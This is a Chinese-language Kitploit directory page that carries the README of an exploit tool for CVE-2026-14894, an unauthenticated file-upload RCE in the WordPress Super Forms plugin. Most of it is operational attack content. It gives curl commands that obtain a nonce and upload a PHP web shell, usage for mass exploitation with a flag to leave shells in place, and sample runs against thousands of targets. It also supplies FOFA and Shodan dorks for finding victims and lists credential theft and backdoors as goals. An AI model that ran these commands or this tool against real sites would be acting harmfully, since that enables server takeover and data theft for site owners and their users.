Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-14894 — Super Forms 未认证文件上传 RCE | CVSS 9.8 | Kitploit
工具/GitHubGitHub/shinthink/cve-2026-14894
侦察Payload生成漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试学习与教育
GitHubshinthink/cve-2026-14894

CVE-2026-14894

Super Forms 未认证文件上传 RCE | CVSS 9.8

1182个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-14894 — Super Forms 未授权文件上传远程代码执行(RCE)

Nonce 泄露 → datauristring 上传 → 代码执行


概述

CVE-2026-14894 是 WordPress 插件 Super Forms – Drag & Drop Form Builder(由 WebRehab 开发)中一个严重级别(CVSS 9.8)的未授权任意文件上传漏洞,影响版本 ≤ 6.3.313。

super_submit_form nopriv AJAX 处理程序在接收表单提交中的文件上传时,未进行以下检查:

  1. 验证用户是否已认证
  2. 校验文件类型或扩展名
  3. 对照魔术字节检查 MIME 内容

Nonce 防护屏障可被轻易绕过——另一个独立的 nopriv AJAX 处理程序(super_create_nonce)可为任何未认证访客生成有效的 nonce。

攻击者可通过 Base64 编码的 datauristring 载荷上传任意 PHP 文件,这些文件以攻击者控制的文件名被直接写入 /wp-content/uploads/superforms/ 目录,从而实现直接代码执行。

受影响版本

Version状态
≤ 6.3.313受影响
6.3.314+已修复

活跃安装量: 600,000+
发现者: andrea bocchetti(通过 Wordfence,2026 年 7 月 7 日)


漏洞机制

根本原因

Super Forms 的 AJAX 文件上传处理程序缺少三项安全检查:

// Vulnerable: nopriv AJAX — no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce');  // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form');   // upload for anyone

function super_submit_form() {
    $data = json_decode(stripslashes($_POST['data']), true);
    $file = $data['sf_upload_field']['files'][0];
    $content = base64_decode($file['datauristring']);  // no MIME validation
    $name = $file['value'];                             // no filename sanitization
    fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}

Nonce 绕过

// Anyone can get a valid nonce — no authentication required
function super_create_nonce() {
    $nonce = md5(uniqid(rand(), true));
    $_SESSION['sf_nonce'] = $nonce;
    echo $nonce;  // returned to unauthenticated attacker
}

攻击流程

1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
   → Get valid nonce (no auth needed)

2. POST /wp-admin/admin-ajax.php?action=super_submit_form
   sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
     "datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
     "value":"shell.php"}]}}
   → Shell written to /wp-content/uploads/superforms/

3. GET /wp-content/uploads/superforms/shell.php?c=id
   → RCE confirmed

安装

git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt

用法

# Single target
python cve_2026_14894.py -t target.com

# Mass exploit
python cve_2026_14894.py -f targets.txt

# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt

# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup

# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug

参数

  -t, --target      Single target (domain or IP)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every HTTP request + stage in real-time
  -v, --verbose     Show detailed output

概念验证

单个目标

$ python cve_2026_14894.py -t target.com --debug
  Super Forms | CVE-2026-14894 | CVSS 9.8

  [target.com] [+] Super Forms detected v6.3.312
  [target.com] [*] Nonce obtained
  [target.com] [*] Uploading shell...
  [target.com] [!] RCE confirmed

  Host       : target.com
  SuperForms : YES v6.3.312
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
  Output     : uid=33(www-data) gid=33(www-data)
  Time       : 2.1s

批量扫描

  Targets: 2500  |  Threads: 30

  [RCE]    target-vuln-01.com                                 2.1s  v6.3.312
  [UP]     target-patched-02.com                              1.8s  v6.3.314 (upload blocked)
  [!]      target-no-plugin-03.com                            0.5s  not installed
  [150/2500] 6%  |  SuperForms:47  Upload:18  RCE:12

  ───────────────────────────────────────────────────────
  Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12

手动利用

步骤 1 — 获取 nonce

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_create_nonce'
# Returns 96-char hex nonce

步骤 2 — 上传 PHP Web Shell

NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)

curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=super_submit_form' \
  -d "sf_nonce=$NONCE" \
  -d 'form_id=1' \
  -d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'

步骤 3 — 执行命令

curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'

FOFA Dork

body="wp-content/plugins/super-forms"

Shodan

http.html:"super-forms"

影响

成功利用该漏洞可获得以 Web 服务器用户身份远程执行代码的能力,进而:

  • 提取 wp-config.php → 获取数据库凭据
  • 访问所有 WordPress 内容、用户及插件数据
  • 部署持久化后门
  • 横向移动至内部网络

免责声明

仅供教育和授权测试使用。

本软件面向执行授权渗透测试的安全专业人员、审计自身基础设施的组织以及研究漏洞利用的研究人员。

未经授权访问计算机系统属于违法行为,可能违反以下法律法规:

  • 美国:《计算机欺诈与滥用法》(18 U.S.C. 1030)
  • 印度尼西亚:UU ITE 第 30 条及第 46 条
  • 欧盟:第 2013/40/EU 号指令
  • 英国:《1990 年计算机滥用法》

作者对滥用行为不承担任何责任。


参考资料

资源链接
Wordfence 公告wordfence.com
IONIX 公告ionix.io
NVD 条目CVE-2026-14894
研究人员andrea bocchetti

本项目与 WebRehab 或 Super Forms 无任何关联。

下载工具